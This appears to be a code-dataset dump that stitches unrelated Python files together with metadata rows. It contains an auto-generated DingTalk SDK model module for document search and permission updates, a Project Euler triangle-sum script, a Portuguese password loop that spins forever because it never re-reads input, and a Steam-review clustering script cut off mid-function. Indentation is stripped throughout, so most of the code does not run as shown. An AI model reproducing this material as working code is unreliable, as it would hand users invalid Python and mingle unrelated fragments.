_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ManagerGetDefaultHandOverUserRequest(TeaModel):
def __init__(
self,
operator_id: str = None,
):
self.operator_id = operator_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.operator_id is not None:
result['operatorId'] = self.operator_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('operatorId') is not None:
self.operator_id = m.get('operatorId')
return self
class ManagerGetDefaultHandOverUserResponseBody(TeaModel):
def __init__(
self,
default_handover_user_id: str = None,
):
self.default_handover_user_id = default_handover_user_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.default_handover_user_id is not None:
result['defaultHandoverUserId'] = self.default_handover_user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('defaultHandoverUserId') is not None:
self.default_handover_user_id = m.get('defaultHandoverUserId')
return self
class ManagerGetDefaultHandOverUserResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: ManagerGetDefaultHandOverUserResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = ManagerGetDefaultHandOverUserResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ManagerSetDefaultHandOverUserHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ManagerSetDefaultHandOverUserRequest(TeaModel):
def __init__(
self,
default_handover_user_id: str = None,
operator_id: str = None,
):
self.default_handover_user_id = default_handover_user_id
self.operator_id = operator_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.default_handover_user_id is not None:
result['defaultHandoverUserId'] = self.default_handover_user_id
if self.operator_id is not None:
result['operatorId'] = self.operator_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('defaultHandoverUserId') is not None:
self.default_handover_user_id = m.get('defaultHandoverUserId')
if m.get('operatorId') is not None:
self.operator_id = m.get('operatorId')
return self
class ManagerSetDefaultHandOverUserResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class ManagerSetDefaultHandOverUserResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: ManagerSetDefaultHandOverUserResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = ManagerSetDefaultHandOverUserResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SearchDentriesHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SearchDentriesRequestOptionCreateTimeRange(TeaModel):
def __init__(
self,
end_time: int = None,
start_time: int = None,
):
self.end_time = end_time
self.start_time = start_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.end_time is not None:
result['endTime'] = self.end_time
if self.start_time is not None:
result['startTime'] = self.start_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('endTime') is not None:
self.end_time = m.get('endTime')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
return self
class SearchDentriesRequestOptionVisitTimeRange(TeaModel):
def __init__(
self,
end_time: int = None,
start_time: int = None,
):
self.end_time = end_time
self.start_time = start_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.end_time is not None:
result['endTime'] = self.end_time
if self.start_time is not None:
result['startTime'] = self.start_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('endTime') is not None:
self.end_time = m.get('endTime')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
return self
class SearchDentriesRequestOption(TeaModel):
def __init__(
self,
create_time_range: SearchDentriesRequestOptionCreateTimeRange = None,
creator_ids: List[str] = None,
dentry_categories: List[str] = None,
max_results: int = None,
modifier_ids: List[str] = None,
next_token: str = None,
visit_time_range: SearchDentriesRequestOptionVisitTimeRange = None,
):
self.create_time_range = create_time_range
self.creator_ids = creator_ids
self.dentry_categories = dentry_categories
self.max_results = max_results
self.modifier_ids = modifier_ids
self.next_token = next_token
self.visit_time_range = visit_time_range
def validate(self):
if self.create_time_range:
self.create_time_range.validate()
if self.visit_time_range:
self.visit_time_range.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.create_time_range is not None:
result['createTimeRange'] = self.create_time_range.to_map()
if self.creator_ids is not None:
result['creatorIds'] = self.creator_ids
if self.dentry_categories is not None:
result['dentryCategories'] = self.dentry_categories
if self.max_results is not None:
result['maxResults'] = self.max_results
if self.modifier_ids is not None:
result['modifierIds'] = self.modifier_ids
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.visit_time_range is not None:
result['visitTimeRange'] = self.visit_time_range.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('createTimeRange') is not None:
temp_model = SearchDentriesRequestOptionCreateTimeRange()
self.create_time_range = temp_model.from_map(m['createTimeRange'])
if m.get('creatorIds') is not None:
self.creator_ids = m.get('creatorIds')
if m.get('dentryCategories') is not None:
self.dentry_categories = m.get('dentryCategories')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
if m.get('modifierIds') is not None:
self.modifier_ids = m.get('modifierIds')
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('visitTimeRange') is not None:
temp_model = SearchDentriesRequestOptionVisitTimeRange()
self.visit_time_range = temp_model.from_map(m['visitTimeRange'])
return self
class SearchDentriesRequest(TeaModel):
def __init__(
self,
keyword: str = None,
option: SearchDentriesRequestOption = None,
operator_id: str = None,
):
self.keyword = keyword
self.option = option
self.operator_id = operator_id
def validate(self):
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.keyword is not None:
result['keyword'] = self.keyword
if self.option is not None:
result['option'] = self.option.to_map()
if self.operator_id is not None:
result['operatorId'] = self.operator_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('keyword') is not None:
self.keyword = m.get('keyword')
if m.get('option') is not None:
temp_model = SearchDentriesRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('operatorId') is not None:
self.operator_id = m.get('operatorId')
return self
class SearchDentriesResponseBodyItemsCreator(TeaModel):
def __init__(
self,
name: str = None,
user_id: str = None,
):
self.name = name
self.user_id = user_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.user_id is not None:
result['userId'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('userId') is not None:
self.user_id = m.get('userId')
return self
class SearchDentriesResponseBodyItemsModifier(TeaModel):
def __init__(
self,
name: str = None,
user_id: str = None,
):
self.name = name
self.user_id = user_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.user_id is not None:
result['userId'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('userId') is not None:
self.user_id = m.get('userId')
return self
class SearchDentriesResponseBodyItems(TeaModel):
def __init__(
self,
creator: SearchDentriesResponseBodyItemsCreator = None,
dentry_uuid: str = None,
modifier: SearchDentriesResponseBodyItemsModifier = None,
name: str = None,
):
self.creator = creator
self.dentry_uuid = dentry_uuid
self.modifier = modifier
self.name = name
def validate(self):
if self.creator:
self.creator.validate()
if self.modifier:
self.modifier.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.creator is not None:
result['creator'] = self.creator.to_map()
if self.dentry_uuid is not None:
result['dentryUuid'] = self.dentry_uuid
if self.modifier is not None:
result['modifier'] = self.modifier.to_map()
if self.name is not None:
result['name'] = self.name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('creator') is not None:
temp_model = SearchDentriesResponseBodyItemsCreator()
self.creator = temp_model.from_map(m['creator'])
if m.get('dentryUuid') is not None:
self.dentry_uuid = m.get('dentryUuid')
if m.get('modifier') is not None:
temp_model = SearchDentriesResponseBodyItemsModifier()
self.modifier = temp_model.from_map(m['modifier'])
if m.get('name') is not None:
self.name = m.get('name')
return self
class SearchDentriesResponseBody(TeaModel):
def __init__(
self,
items: List[SearchDentriesResponseBodyItems] = None,
next_token: str = None,
):
self.items = items
self.next_token = next_token
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = SearchDentriesResponseBodyItems()
self.items.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
return self
class SearchDentriesResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: SearchDentriesResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = SearchDentriesResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SearchWorkspacesHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SearchWorkspacesRequestOption(TeaModel):
def __init__(
self,
max_results: int = None,
next_token: str = None,
):
self.max_results = max_results
self.next_token = next_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.max_results is not None:
result['maxResults'] = self.max_results
if self.next_token is not None:
result['nextToken'] = self.next_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
return self
class SearchWorkspacesRequest(TeaModel):
def __init__(
self,
keyword: str = None,
option: SearchWorkspacesRequestOption = None,
operator_id: str = None,
):
self.keyword = keyword
self.option = option
self.operator_id = operator_id
def validate(self):
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.keyword is not None:
result['keyword'] = self.keyword
if self.option is not None:
result['option'] = self.option.to_map()
if self.operator_id is not None:
result['operatorId'] = self.operator_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('keyword') is not None:
self.keyword = m.get('keyword')
if m.get('option') is not None:
temp_model = SearchWorkspacesRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('operatorId') is not None:
self.operator_id = m.get('operatorId')
return self
class SearchWorkspacesResponseBodyItems(TeaModel):
def __init__(
self,
name: str = None,
url: str = None,
workspace_id: str = None,
):
self.name = name
self.url = url
self.workspace_id = workspace_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
if self.url is not None:
result['url'] = self.url
if self.workspace_id is not None:
result['workspaceId'] = self.workspace_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('workspaceId') is not None:
self.workspace_id = m.get('workspaceId')
return self
class SearchWorkspacesResponseBody(TeaModel):
def __init__(
self,
items: List[SearchWorkspacesResponseBodyItems] = None,
next_token: str = None,
):
self.items = items
self.next_token = next_token
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = SearchWorkspacesResponseBodyItems()
self.items.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
return self
class SearchWorkspacesResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: SearchWorkspacesResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = SearchWorkspacesResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SetPermissionInheritanceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SetPermissionInheritanceRequest(TeaModel):
def __init__(
self,
inheritance: str = None,
union_id: str = None,
):
self.inheritance = inheritance
self.union_id = union_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.inheritance is not None:
result['inheritance'] = self.inheritance
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('inheritance') is not None:
self.inheritance = m.get('inheritance')
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class SetPermissionInheritanceResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class SetPermissionInheritanceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: SetPermissionInheritanceResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = SetPermissionInheritanceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class UpdatePermissionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdatePermissionRequestMembers(TeaModel):
def __init__(
self,
corp_id: str = None,
id: str = None,
type: str = None,
):
self.corp_id = corp_id
self.id = id
self.type = type
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.id is not None:
result['id'] = self.id
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('id') is not None:
self.id = m.get('id')
if m.get('type') is not None:
self.type = m.get('type')
return self
class UpdatePermissionRequestOption(TeaModel):
def __init__(
self,
duration: int = None,
):
self.duration = duration
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.duration is not None:
result['duration'] = self.duration
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('duration') is not None:
self.duration = m.get('duration')
return self
class UpdatePermissionRequest(TeaModel):
def __init__(
self,
members: List[UpdatePermissionRequestMembers] = None,
option: UpdatePermissionRequestOption = None,
role_id: str = None,
union_id: str = None,
):
self.members = members
self.option = option
self.role_id = role_id
self.union_id = union_id
def validate(self):
if self.members:
for k in self.members:
if k:
k.validate()
if self.option:
self.option.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['members'] = []
if self.members is not None:
for k in self.members:
result['members'].append(k.to_map() if k else None)
if self.option is not None:
result['option'] = self.option.to_map()
if self.role_id is not None:
result['roleId'] = self.role_id
if self.union_id is not None:
result['unionId'] = self.union_id
return result
def from_map(self, m: dict = None):
m = m or dict()
self.members = []
if m.get('members') is not None:
for k in m.get('members'):
temp_model = UpdatePermissionRequestMembers()
self.members.append(temp_model.from_map(k))
if m.get('option') is not None:
temp_model = UpdatePermissionRequestOption()
self.option = temp_model.from_map(m['option'])
if m.get('roleId') is not None:
self.role_id = m.get('roleId')
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
return self
class UpdatePermissionResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class UpdatePermissionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: UpdatePermissionResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = UpdatePermissionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
5c330645e90f346492de9fffdb54c9a30ee92529 | e73f0bd1e15de5b8cb70f1d603ceedc18c42b39b | /Project Euler/018 - triangle path sum.py | e1bc49732e1df9a18b08e09522015fe6b956ba5e | [] | no_license | thran/the_code | cbfa3b8be86c3b31f76f6fbd1deb2013d3326a4a | ba73317ddc42e10791a829cc6e1a3460cc601c44 | refs/heads/master | 2023-01-05T14:39:16.708461 | 2022-12-25T08:37:39 | 2022-12-25T08:37:39 | 160,978,160 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | triangle = """75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23"""
triangle = ([map(int, line.split()) for line in triangle.split("\n")])
# print triangle
maxs = [[0, triangle[0][0], 0]]
for line_number in range(1, len(triangle)):
m_line = [0]
for position in range(line_number+1):
m = max(maxs[line_number-1][position], maxs[line_number-1][position+1])
m_line.append(triangle[line_number][position] + m)
maxs.append(m_line+[0])
print max(maxs[-1])
| [
"thran@centrum.cz"
] | thran@centrum.cz |
dad79b226929c9b8fefe77d75b0102dbdc30556c | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_197/ch37_2020_03_23_20_05_44_218037.py | 90428a35c7cf9ff017b68e78d1f501efd0391b52 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | senha="desisto"
Palavra=input("Qual é a senha?")
while Palavra!=senha:
print (Palavra)
else:
print ("Você acertou a senha!") | [
"you@example.com"
] | you@example.com |
a92ae45b4a061d52294fad8bc4060e948b413111 | c634846b4ae574ff265e1a2f140448a33655abb9 | /cluster_reviews.py | 938caa6c238548d0b037e722f8c125bec4d7c26d | [
"MIT"
] | permissive | Amoner/steam-reviews | ac498cb10bb9e50218d6a2aba247aab3e8038f38 | 7e13a71ac9c465f0ae0672843598d52910cbc775 | refs/heads/master | 2020-09-04T23:38:41.376742 | 2019-08-23T05:22:22 | 2019-08-23T05:22:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,609 | py | import sys
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.cluster import AffinityPropagation
from sklearn.cluster import AgglomerativeClustering
from sklearn.cluster import Birch
from sklearn.cluster import DBSCAN
from sklearn.decomposition import PCA
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import StandardScaler
from textblob import TextBlob
from describe_reviews import analyze_app_id_in_english, get_review_content
def test_imported_module():
app_id = "573170"
review_id = "38674426"
review_content = get_review_content(app_id, review_id)
print('Test of review retrieval:')
print_sentiment_analysis(review_content)
try:
print(review_content)
except UnicodeEncodeError:
# Reference: https://stackoverflow.com/a/3224300
print(review_content.encode('ascii', 'ignore'))
return
def convert_from_pandas(data_frame):
# Convert from Pandas to NumPy arrays
# Reference: https://stackoverflow.com/a/22653050
return data_frame.reset_index().values
def convert_from_pandas_dataframe_to_numpy_matrix(df, excluded_columns=None):
# Maybe the variable excluded_columns is not needed after all... I just leave it there as a legacy for now.
if excluded_columns is None:
# noinspection PyPep8Naming
D = df
else:
# Reference: https://stackoverflow.com/a/32152755
# noinspection PyPep8Naming
D = df.loc[:, df.columns.difference(excluded_columns)]
# noinspection PyPep8Naming
D_binary = D.loc[:, ['received_for_free', 'steam_purchase', 'voted_up']]
# noinspection PyPep8,PyPep8Naming
D_generic = D.loc[:,
['num_games_owned', 'num_reviews', 'playtime_forever', 'votes_up', 'votes_funny', 'comment_count',
'weighted_vote_score']]
# noinspection PyPep8Naming
D_length_correlated = D.loc[:, ['character_count', 'syllable_count', 'lexicon_count', 'sentence_count']]
# noinspection PyPep8Naming
D_readability_correlated = D.loc[:,
['dale_chall_readability_score', 'flesch_reading_ease', 'difficult_words_count']]
# noinspection PyPep8Naming
D_sentiment = D.loc[:, ['polarity', 'subjectivity']]
# noinspection PyPep8Naming
X_binary = convert_from_pandas(D_binary)
# noinspection PyPep8Naming
X_generic = convert_from_pandas(D_generic)
# noinspection PyPep8Naming
X_length_correlated = convert_from_pandas(D_length_correlated)
# noinspection PyPep8Naming
X_readability_correlated = convert_from_pandas(D_readability_correlated)
# noinspection PyPep8Naming
X_readability_correlated = np.nan_to_num(X_readability_correlated)
# noinspection PyPep8Naming
X_sentiment = convert_from_pandas(D_sentiment)
scaler = StandardScaler()
# noinspection PyPep8Naming
X_generic_new = scaler.fit_transform(X_generic)
pca_length = PCA(n_components=2)
# noinspection PyPep8Naming
X_length_correlated_new = pca_length.fit_transform(X_length_correlated)
pca_readability = PCA(n_components=2)
# noinspection PyPep8Naming
X_readability_correlated_new = pca_readability.fit_transform(X_readability_correlated)
sentiment_scaler = StandardScaler()
# noinspection PyPep8Naming
X_sentiment_new = sentiment_scaler.fit_transform(X_sentiment)
# noinspection PyPep8Naming
X = np.concatenate(
(X_binary, X_generic_new, X_length_correlated_new, X_readability_correlated_new, X_sentiment_new), axis=1)
return X
def get_top_clusters_by_count(af, provided_labels=None, verbose=False):
if provided_labels is None:
provided_labels = []
if (provided_labels is None) or len(provided_labels) == 0:
# cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
else:
labels = provided_labels
summary_labels = pd.Series(labels).apply(str).value_counts()
if verbose:
print("\nCluster stats: ")
print(summary_labels)
list_of_clusters_by_count = summary_labels.index.tolist()
return summary_labels, list_of_clusters_by_count
def show_representative_reviews(app_id, df, af, num_top_clusters=None, verbose=False):
# Show representative reviews, i.e. the reviews used as cluster centers for Affinity Propagation
# df: dataframe
# af: affinity propagation model
cluster_centers_indices = af.cluster_centers_indices_
# labels = af.labels_
# noinspection PyTypeChecker
(summary_labels, list_of_clusters_by_count) = get_top_clusters_by_count(af,
provided_labels=None,
verbose=verbose)
if num_top_clusters is None:
top_clusters = list_of_clusters_by_count
else:
top_clusters = list_of_clusters_by_count[0:num_top_clusters]
